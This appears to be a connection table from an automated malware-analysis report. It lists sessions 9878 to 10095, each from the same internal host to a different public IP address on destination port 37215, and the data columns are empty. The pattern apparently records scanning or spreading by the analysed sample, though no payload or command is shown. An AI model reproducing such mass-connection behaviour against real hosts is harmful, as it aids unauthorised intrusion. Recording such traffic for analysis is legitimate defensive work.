                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9878192.168.2.1533418156.135.18.12437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9879192.168.2.154995431.124.192.18137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9880192.168.2.1548450122.215.160.20437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9881192.168.2.1545520102.122.8.12337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9882192.168.2.1533914138.208.218.14437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9883192.168.2.153613094.233.69.9137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9884192.168.2.1533252186.224.43.20737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9885192.168.2.1544558186.190.184.3637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9886192.168.2.1557970138.22.30.10237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9887192.168.2.153672831.158.69.5237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9888192.168.2.153734045.230.60.6337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9889192.168.2.1551262138.92.75.637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9890192.168.2.1546638197.88.216.12137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9891192.168.2.1556912186.210.145.11237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9892192.168.2.1546998121.146.135.17837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9893192.168.2.1558972197.106.74.17537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9894192.168.2.1536968190.210.206.23437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9895192.168.2.1544024181.32.231.13937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9896192.168.2.1557294122.93.17.10737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9897192.168.2.1535050167.37.215.18137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9898192.168.2.1549322190.215.33.2637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9899192.168.2.1538242122.254.91.10737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9900192.168.2.154259045.165.254.14437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9901192.168.2.1546082181.227.164.22937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9902192.168.2.1560750181.208.166.7437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9903192.168.2.1542338181.30.106.14737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9904192.168.2.1553940138.137.77.23937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9905192.168.2.1537598121.30.179.6337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9906192.168.2.1541466157.64.70.19237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9907192.168.2.1560870190.40.184.4837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9908192.168.2.153491441.107.1.9037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9909192.168.2.1558144122.90.168.11337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9910192.168.2.1539426222.247.60.20137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9911192.168.2.1546052108.204.33.437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9912192.168.2.1547060129.71.213.18937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9913192.168.2.1540102190.244.149.2037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9914192.168.2.155864694.219.188.23137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9915192.168.2.1534072181.254.180.2637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9916192.168.2.1556736197.0.246.4237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9917192.168.2.1538006192.148.248.7937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9918192.168.2.1557752190.27.247.18137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9919192.168.2.155002045.108.158.7437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9920192.168.2.1544770138.17.253.2537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9921192.168.2.153599837.74.228.6537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9922192.168.2.1556872121.230.221.19137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9923192.168.2.1548142222.125.60.3137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9924192.168.2.153751441.197.72.13637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9925192.168.2.1557570156.79.113.3237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9926192.168.2.154860837.130.101.21837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9927192.168.2.1550654186.185.93.10137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9928192.168.2.153370037.226.40.16337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9929192.168.2.1555200181.130.29.11737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9930192.168.2.1559538197.171.173.24137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9931192.168.2.1540752121.243.89.12237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9932192.168.2.154772464.202.82.1937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9933192.168.2.1538718169.150.102.8937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9934192.168.2.153503631.134.0.23637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9935192.168.2.154222094.42.144.9637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9936192.168.2.154972437.132.153.437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9937192.168.2.156098845.71.25.19537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9938192.168.2.155306245.22.237.24237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9939192.168.2.1537846122.234.215.17437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9940192.168.2.1540492190.25.95.16137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9941192.168.2.1538466115.208.50.20237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9942192.168.2.1536288157.225.102.2237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9943192.168.2.1556456186.176.177.4037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9944192.168.2.1553146186.141.224.4437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9945192.168.2.154438231.197.8.20137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9946192.168.2.1539760121.241.14.17437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9947192.168.2.1537936181.210.32.13937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9948192.168.2.1535538138.162.18.14137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9949192.168.2.1532970190.106.205.4837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9950192.168.2.1533864222.125.42.8137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9951192.168.2.1542162122.206.58.24337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9952192.168.2.1545824207.223.10.15237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9953192.168.2.1560206156.40.245.3537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9954192.168.2.1557400138.245.201.2037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9955192.168.2.155358294.188.154.1537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9956192.168.2.1536526156.241.100.5437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9957192.168.2.155730645.87.153.4537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9958192.168.2.1558420156.62.128.23337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9959192.168.2.1544858156.75.95.10337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9960192.168.2.1555268102.144.119.1937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9961192.168.2.1536486122.159.195.13637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9962192.168.2.1546220157.11.254.7937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9963192.168.2.1559556156.110.143.7037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9964192.168.2.1549662190.46.227.23037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9965192.168.2.154965241.96.167.24337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9966192.168.2.1557780156.115.23.1537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9967192.168.2.1543920102.25.173.14437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9968192.168.2.153682237.111.164.17537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9969192.168.2.1550974157.230.77.17537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9970192.168.2.1548318121.236.156.8137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9971192.168.2.155102094.245.252.22037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9972192.168.2.1538062156.100.252.23137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9973192.168.2.1549462197.49.202.7137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9974192.168.2.1555302197.135.243.10037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9975192.168.2.1537950122.74.185.037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9976192.168.2.155332694.78.227.1037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9977192.168.2.1536530138.219.24.22937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9978192.168.2.1535274186.220.187.18937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9979192.168.2.155114494.25.19.16937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9980192.168.2.1558594102.129.1.15937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9981192.168.2.153482041.85.99.11537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9982192.168.2.156084094.214.24.14637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9983192.168.2.1551414102.95.154.14937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9984192.168.2.1537502222.45.100.22237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9985192.168.2.1551150121.9.123.3937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9986192.168.2.1535544181.42.77.17337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9987192.168.2.1551038121.245.117.2937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9988192.168.2.153744094.241.252.11337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9989192.168.2.155808089.84.39.10337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9990192.168.2.1532840186.200.55.1537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9991192.168.2.1546278121.219.4.10837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9992192.168.2.1533486181.82.34.10337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9993192.168.2.1538418181.30.22.14637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9994192.168.2.155549494.254.236.13837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9995192.168.2.1541244197.42.156.15337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9996192.168.2.1545316157.120.224.6937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9997192.168.2.153580245.111.75.20337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9998192.168.2.1560588197.121.98.18937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9999192.168.2.1551208156.22.148.20337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10000192.168.2.155954894.195.161.13737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10001192.168.2.1553154156.243.81.16437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10002192.168.2.153556841.244.117.1837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10003192.168.2.1549416181.76.24.7637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10004192.168.2.1558716122.107.22.10937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10005192.168.2.1548364197.40.231.24237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10006192.168.2.1539676181.200.127.24137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10007192.168.2.1557368121.164.69.16637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10008192.168.2.1535316128.233.160.10037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10009192.168.2.1550002190.140.228.10137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10010192.168.2.154850837.193.125.18437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10011192.168.2.1543702222.70.131.9737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10012192.168.2.1537316197.54.231.18637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10013192.168.2.1536854157.244.210.17837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10014192.168.2.1543844138.165.186.5637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10015192.168.2.155174645.123.2.5937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10016192.168.2.154213494.95.111.637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10017192.168.2.1551444197.152.243.14437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10018192.168.2.1550370190.80.242.6237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10019192.168.2.153750841.130.237.10637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10020192.168.2.1548456181.151.235.4037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10021192.168.2.154981245.39.17.437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10022192.168.2.1539454121.83.33.20737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10023192.168.2.1550764186.154.32.20437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10024192.168.2.155139637.181.74.16237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10025192.168.2.1541012222.209.134.9237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10026192.168.2.1556614122.4.15.16437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10027192.168.2.154282094.120.142.7437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10028192.168.2.1559934181.15.196.13237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10029192.168.2.1553940122.66.37.22337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10030192.168.2.1545000157.73.94.10337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10031192.168.2.1541300122.93.117.20037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10032192.168.2.1546896156.67.245.4437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10033192.168.2.1546130138.241.68.3637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10034192.168.2.1535216181.3.171.18637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10035192.168.2.154613637.3.183.13837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10036192.168.2.1556682138.236.64.1037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10037192.168.2.156030631.29.217.19537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10038192.168.2.155600824.167.173.637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10039192.168.2.154449638.36.55.6037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10040192.168.2.1537348122.183.209.20137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10041192.168.2.1555942121.76.156.24737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10042192.168.2.154418441.40.119.22537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10043192.168.2.1544862190.202.178.1037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10044192.168.2.1549602197.92.211.637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10045192.168.2.1555282157.168.252.15637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10046192.168.2.155169631.232.47.11037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10047192.168.2.1535542121.73.123.17237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10048192.168.2.153727031.99.135.4837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10049192.168.2.1545752222.158.187.18337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10050192.168.2.1532996139.248.72.10037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10051192.168.2.1545104190.197.244.17737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10052192.168.2.1541208157.149.2.24837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10053192.168.2.1532804122.33.195.21037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10054192.168.2.1539884156.225.170.21037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10055192.168.2.1534494190.6.233.15637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10056192.168.2.1539882102.162.95.1537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10057192.168.2.1556524222.209.40.8937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10058192.168.2.1544834197.6.117.23837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10059192.168.2.1533460122.211.55.5237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10060192.168.2.1558218222.149.147.17237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10061192.168.2.154523412.237.210.12537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10062192.168.2.155592841.125.16.18137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10063192.168.2.1541500122.151.59.5637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10064192.168.2.1544966102.232.145.9637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10065192.168.2.154613031.147.132.2137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10066192.168.2.155080245.189.67.14337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10067192.168.2.153585045.238.232.24537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10068192.168.2.155742841.167.246.10937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10069192.168.2.1553372222.201.12.3637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10070192.168.2.1540420121.87.183.21437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10071192.168.2.155857645.98.199.7137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10072192.168.2.153843494.102.65.17637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10073192.168.2.1546842197.63.201.14737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10074192.168.2.155391437.200.137.14337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10075192.168.2.1546728157.40.207.15637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10076192.168.2.1547608186.61.50.9437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10077192.168.2.1539794138.94.214.337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10078192.168.2.1544248102.12.109.6737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10079192.168.2.154689241.9.97.12037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10080192.168.2.1550284156.60.216.13937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10081192.168.2.1551182156.196.125.15437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10082192.168.2.154203637.148.114.19837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10083192.168.2.1543676122.209.125.25437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10084192.168.2.1554250190.208.212.19837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10085192.168.2.154899841.106.181.9437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10086192.168.2.1552380157.219.240.17137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10087192.168.2.1558396122.249.212.22237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10088192.168.2.1558364121.86.184.6537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10089192.168.2.154869241.124.132.18437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10090192.168.2.1560130156.213.134.1537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10091192.168.2.154695245.7.89.15337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10092192.168.2.1554762102.28.115.20737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10093192.168.2.155510494.112.61.2337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10094192.168.2.1545462197.14.12.5137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10095192.168.2.154422441.61.173.6037215
                                              TimestampBytes transferredDirectionData


